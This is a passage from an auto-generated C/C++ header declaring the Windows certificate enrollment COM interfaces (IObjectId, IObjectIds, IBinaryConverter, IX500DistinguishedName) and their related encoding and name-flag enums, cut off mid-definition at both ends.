	XCN_CRYPT_STRING_HEXASCII	= 0x5,
	XCN_CRYPT_STRING_BASE64_ANY	= 0x6,
	XCN_CRYPT_STRING_ANY	= 0x7,
	XCN_CRYPT_STRING_HEX_ANY	= 0x8,
	XCN_CRYPT_STRING_BASE64X509CRLHEADER	= 0x9,
	XCN_CRYPT_STRING_HEXADDR	= 0xa,
	XCN_CRYPT_STRING_HEXASCIIADDR	= 0xb,
	XCN_CRYPT_STRING_HEXRAW	= 0xc,
	XCN_CRYPT_STRING_HASHDATA	= 0x10000000,
	XCN_CRYPT_STRING_STRICT	= 0x20000000,
	XCN_CRYPT_STRING_NOCRLF	= 0x40000000,
	XCN_CRYPT_STRING_NOCR	= 0x80000000
    } 	EncodingType;

typedef 
enum PFXExportOptions
    {	PFXExportEEOnly	= 0,
	PFXExportChainNoRoot	= 1,
	PFXExportChainWithRoot	= 2
    } 	PFXExportOptions;

typedef 
enum ObjectIdGroupId
    {	XCN_CRYPT_ANY_GROUP_ID	= 0,
	XCN_CRYPT_HASH_ALG_OID_GROUP_ID	= 1,
	XCN_CRYPT_ENCRYPT_ALG_OID_GROUP_ID	= 2,
	XCN_CRYPT_PUBKEY_ALG_OID_GROUP_ID	= 3,
	XCN_CRYPT_SIGN_ALG_OID_GROUP_ID	= 4,
	XCN_CRYPT_RDN_ATTR_OID_GROUP_ID	= 5,
	XCN_CRYPT_EXT_OR_ATTR_OID_GROUP_ID	= 6,
	XCN_CRYPT_ENHKEY_USAGE_OID_GROUP_ID	= 7,
	XCN_CRYPT_POLICY_OID_GROUP_ID	= 8,
	XCN_CRYPT_TEMPLATE_OID_GROUP_ID	= 9,
	XCN_CRYPT_LAST_OID_GROUP_ID	= 10,
	XCN_CRYPT_FIRST_ALG_OID_GROUP_ID	= 1,
	XCN_CRYPT_LAST_ALG_OID_GROUP_ID	= 4,
	XCN_CRYPT_GROUP_ID_MASK	= 0xffff,
	XCN_CRYPT_OID_PREFER_CNG_ALGID_FLAG	= 0x40000000,
	XCN_CRYPT_OID_DISABLE_SEARCH_DS_FLAG	= 0x80000000,
	XCN_CRYPT_OID_INFO_OID_GROUP_BIT_LEN_MASK	= 0xfff0000,
	XCN_CRYPT_OID_INFO_OID_GROUP_BIT_LEN_SHIFT	= 16,
	XCN_CRYPT_KEY_LENGTH_MASK	= 0xfff0000
    } 	ObjectIdGroupId;

typedef 
enum ObjectIdPublicKeyFlags
    {	XCN_CRYPT_OID_INFO_PUBKEY_ANY	= 0,
	XCN_CRYPT_OID_INFO_PUBKEY_SIGN_KEY_FLAG	= 0x80000000,
	XCN_CRYPT_OID_INFO_PUBKEY_ENCRYPT_KEY_FLAG	= 0x40000000
    } 	ObjectIdPublicKeyFlags;

typedef 
enum AlgorithmFlags
    {	AlgorithmFlagsNone	= 0,
	AlgorithmFlagsWrap	= 0x1
    } 	AlgorithmFlags;

// Should be from certcli.h
typedef 
enum X509EnrollmentAuthFlags 
    {   X509AuthNone,
    X509AuthAnonymous,
    X509AuthKerberos,
    X509AuthUsername,
    X509AuthCertificate
    }   X509EnrollmentAuthFlags;


extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0000_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0000_v0_0_s_ifspec;

#ifndef __IObjectId_INTERFACE_DEFINED__
#define __IObjectId_INTERFACE_DEFINED__

/* interface IObjectId */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IObjectId;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab300-217d-11da-b2a4-000e7bbb2b09")
    IObjectId : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromName( 
            /* [in] */ CERTENROLL_OBJECTID Name) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromValue( 
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromAlgorithmName( 
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [in] */ __RPC__in BSTR strAlgorithmName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__out CERTENROLL_OBJECTID *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_FriendlyName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Value( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAlgorithmName( 
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrAlgorithmName) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IObjectIdVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IObjectId * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IObjectId * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IObjectId * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IObjectId * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IObjectId * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromName )( 
            __RPC__in IObjectId * This,
            /* [in] */ CERTENROLL_OBJECTID Name);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromValue )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromAlgorithmName )( 
            __RPC__in IObjectId * This,
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [in] */ __RPC__in BSTR strAlgorithmName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in IObjectId * This,
            /* [retval][out] */ __RPC__out CERTENROLL_OBJECTID *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in IObjectId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_FriendlyName )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Value )( 
            __RPC__in IObjectId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAlgorithmName )( 
            __RPC__in IObjectId * This,
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrAlgorithmName);
        
        END_INTERFACE
    } IObjectIdVtbl;

    interface IObjectId
    {
        CONST_VTBL struct IObjectIdVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IObjectId_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IObjectId_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IObjectId_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IObjectId_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IObjectId_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IObjectId_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IObjectId_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IObjectId_InitializeFromName(This,Name)	\
    ( (This)->lpVtbl -> InitializeFromName(This,Name) ) 

#define IObjectId_InitializeFromValue(This,strValue)	\
    ( (This)->lpVtbl -> InitializeFromValue(This,strValue) ) 

#define IObjectId_InitializeFromAlgorithmName(This,GroupId,KeyFlags,AlgFlags,strAlgorithmName)	\
    ( (This)->lpVtbl -> InitializeFromAlgorithmName(This,GroupId,KeyFlags,AlgFlags,strAlgorithmName) ) 

#define IObjectId_get_Name(This,pValue)	\
    ( (This)->lpVtbl -> get_Name(This,pValue) ) 

#define IObjectId_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#define IObjectId_put_FriendlyName(This,Value)	\
    ( (This)->lpVtbl -> put_FriendlyName(This,Value) ) 

#define IObjectId_get_Value(This,pValue)	\
    ( (This)->lpVtbl -> get_Value(This,pValue) ) 

#define IObjectId_GetAlgorithmName(This,GroupId,KeyFlags,pstrAlgorithmName)	\
    ( (This)->lpVtbl -> GetAlgorithmName(This,GroupId,KeyFlags,pstrAlgorithmName) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IObjectId_INTERFACE_DEFINED__ */


#ifndef __IObjectIds_INTERFACE_DEFINED__
#define __IObjectIds_INTERFACE_DEFINED__

/* interface IObjectIds */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IObjectIds;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab301-217d-11da-b2a4-000e7bbb2b09")
    IObjectIds : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IObjectId *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE AddRange( 
            /* [in] */ __RPC__in_opt IObjectIds *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IObjectIdsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IObjectIds * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IObjectIds * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IObjectIds * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IObjectIds * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IObjectIds * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IObjectIds * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IObjectIds * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IObjectIds * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in_opt IObjectId *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IObjectIds * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IObjectIds * This);
        
        HRESULT ( STDMETHODCALLTYPE *AddRange )( 
            __RPC__in IObjectIds * This,
            /* [in] */ __RPC__in_opt IObjectIds *pValue);
        
        END_INTERFACE
    } IObjectIdsVtbl;

    interface IObjectIds
    {
        CONST_VTBL struct IObjectIdsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IObjectIds_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IObjectIds_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IObjectIds_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IObjectIds_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IObjectIds_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IObjectIds_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IObjectIds_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IObjectIds_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IObjectIds_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IObjectIds_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IObjectIds_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IObjectIds_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IObjectIds_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IObjectIds_AddRange(This,pValue)	\
    ( (This)->lpVtbl -> AddRange(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IObjectIds_INTERFACE_DEFINED__ */


#ifndef __IBinaryConverter_INTERFACE_DEFINED__
#define __IBinaryConverter_INTERFACE_DEFINED__

/* interface IBinaryConverter */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IBinaryConverter;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab302-217d-11da-b2a4-000e7bbb2b09")
    IBinaryConverter : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE StringToString( 
            /* [in] */ __RPC__in BSTR strEncodedIn,
            /* [in] */ EncodingType EncodingIn,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE VariantByteArrayToString( 
            /* [in] */ __RPC__in VARIANT *pvarByteArray,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE StringToVariantByteArray( 
            /* [in] */ __RPC__in BSTR strEncoded,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out VARIANT *pvarByteArray) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IBinaryConverterVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IBinaryConverter * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IBinaryConverter * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IBinaryConverter * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IBinaryConverter * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *StringToString )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in BSTR strEncodedIn,
            /* [in] */ EncodingType EncodingIn,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *VariantByteArrayToString )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in VARIANT *pvarByteArray,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncoded);
        
        HRESULT ( STDMETHODCALLTYPE *StringToVariantByteArray )( 
            __RPC__in IBinaryConverter * This,
            /* [in] */ __RPC__in BSTR strEncoded,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out VARIANT *pvarByteArray);
        
        END_INTERFACE
    } IBinaryConverterVtbl;

    interface IBinaryConverter
    {
        CONST_VTBL struct IBinaryConverterVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IBinaryConverter_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IBinaryConverter_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IBinaryConverter_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IBinaryConverter_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IBinaryConverter_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IBinaryConverter_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IBinaryConverter_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IBinaryConverter_StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> StringToString(This,strEncodedIn,EncodingIn,Encoding,pstrEncoded) ) 

#define IBinaryConverter_VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded)	\
    ( (This)->lpVtbl -> VariantByteArrayToString(This,pvarByteArray,Encoding,pstrEncoded) ) 

#define IBinaryConverter_StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray)	\
    ( (This)->lpVtbl -> StringToVariantByteArray(This,strEncoded,Encoding,pvarByteArray) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IBinaryConverter_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0003 */
/* [local] */ 

typedef 
enum X500NameFlags
    {	XCN_CERT_NAME_STR_NONE	= 0,
	XCN_CERT_SIMPLE_NAME_STR	= 1,
	XCN_CERT_OID_NAME_STR	= 2,
	XCN_CERT_X500_NAME_STR	= 3,
	XCN_CERT_XML_NAME_STR	= 4,
	XCN_CERT_NAME_STR_SEMICOLON_FLAG	= 0x40000000,
	XCN_CERT_NAME_STR_NO_PLUS_FLAG	= 0x20000000,
	XCN_CERT_NAME_STR_NO_QUOTING_FLAG	= 0x10000000,
	XCN_CERT_NAME_STR_CRLF_FLAG	= 0x8000000,
	XCN_CERT_NAME_STR_COMMA_FLAG	= 0x4000000,
	XCN_CERT_NAME_STR_REVERSE_FLAG	= 0x2000000,
	XCN_CERT_NAME_STR_FORWARD_FLAG	= 0x1000000,
	XCN_CERT_NAME_STR_DISABLE_IE4_UTF8_FLAG	= 0x10000,
	XCN_CERT_NAME_STR_ENABLE_T61_UNICODE_FLAG	= 0x20000,
	XCN_CERT_NAME_STR_ENABLE_UTF8_UNICODE_FLAG	= 0x40000,
	XCN_CERT_NAME_STR_FORCE_UTF8_DIR_STR_FLAG	= 0x80000,
	XCN_CERT_NAME_STR_DISABLE_UTF8_DIR_STR_FLAG	= 0x100000,
	XCN_CERT_NAME_STR_ENABLE_PUNYCODE_FLAG	= 0x200000
    } 	X500NameFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0003_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0003_v0_0_s_ifspec;

#ifndef __IX500DistinguishedName_INTERFACE_DEFINED__
#define __IX500DistinguishedName_INTERFACE_DEFINED__

/* interface IX500DistinguishedName */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX500DistinguishedName;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab303-217d-11da-b2a4-000e7bbb2b09")
    IX500DistinguishedName : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Decode( 
            /* [in] */ __RPC__in BSTR strEncodedName,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64,
            /* [defaultvalue][in] */ X500NameFlags NameFlags = XCN_CERT_NAME_STR_NONE) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Encode( 
            /* [in] */ __RPC__in BSTR strName,
            /* [defaultvalue][in] */ X500NameFlags NameFlags = XCN_CERT_NAME_STR_NONE) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncodedName( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX500DistinguishedNameVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX500DistinguishedName * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX500DistinguishedName * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX500DistinguishedName * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX500DistinguishedName * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Decode )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in BSTR strEncodedName,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X500NameFlags NameFlags);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX500DistinguishedName * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [defaultvalue][in] */ X500NameFlags NameFlags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in IX500DistinguishedName * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncodedName )( 
            __RPC__in IX500DistinguishedName * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX500DistinguishedNameVtbl;

    interface IX500DistinguishedName
    {
        CONST_VTBL struct IX500DistinguishedNameVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX500DistinguishedName_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX500DistinguishedName_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX500DistinguishedName_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX500DistinguishedName_GetTypeInfoCount(This,pctinfo)	\
